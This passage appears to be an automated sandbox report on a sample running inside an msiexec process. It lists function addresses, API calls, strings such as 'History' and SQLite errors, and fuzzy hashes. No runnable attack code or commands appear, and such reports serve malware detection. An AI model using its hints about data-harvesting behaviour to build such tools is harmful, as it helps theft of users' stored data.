                                                                                                        Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                        • memset.MSVCRT ref: 00408FD4
                                                                                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                        • memset.MSVCRT ref: 00409042
                                                                                                        • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                          • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 265355444-0
                                                                                                        • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                        • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                        • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                        • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                        Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004116FF
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                        • API String ID: 2618321458-3614832568
                                                                                                        • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                        • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                        Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFilefreememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2507021081-0
                                                                                                        • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                        • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                        Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                        • malloc.MSVCRT ref: 00417524
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                        • free.MSVCRT ref: 00417544
                                                                                                        • free.MSVCRT ref: 00417562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4131324427-0
                                                                                                        • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                        • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                        Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                        • free.MSVCRT ref: 0041822B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PathTemp$free
                                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                                        • API String ID: 924794160-1420421710
                                                                                                        • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                        • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                        Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040FDD5
                                                                                                          • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                        • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                        • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                        • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                        • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                        • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                        Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                                        • String ID: Error$Error %d: %s
                                                                                                        • API String ID: 313946961-1552265934
                                                                                                        • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                        • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                        Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: foreign key constraint failed$new$oid$old
                                                                                                        • API String ID: 0-1953309616
                                                                                                        • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                        • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                        • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                        • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                        Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                        • API String ID: 3510742995-272990098
                                                                                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                        Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                        • memset.MSVCRT ref: 0040C439
                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1265369119-0
                                                                                                        • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                        • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                        Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0044A6EB
                                                                                                        • memset.MSVCRT ref: 0044A6FB
                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 1297977491-4203073231
                                                                                                        • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                        • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                        Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                        • free.MSVCRT ref: 0040E9D3
                                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2241099983-0
                                                                                                        • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                        • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                        Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                        • malloc.MSVCRT ref: 004174BD
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                        • free.MSVCRT ref: 004174E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 4053608372-0
                                                                                                        • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                        • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                        Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                        Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • memset.MSVCRT ref: 004450CD
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1471605966-0
                                                                                                        • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                        • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                        Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                        • String ID: \StringFileInfo\
                                                                                                        • API String ID: 102104167-2245444037
                                                                                                        • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                        • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                        Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                        Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memicmpwcslen
                                                                                                        • String ID: @@@@$History
                                                                                                        • API String ID: 1872909662-685208920
                                                                                                        • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                        • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                        • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                        • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                        Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
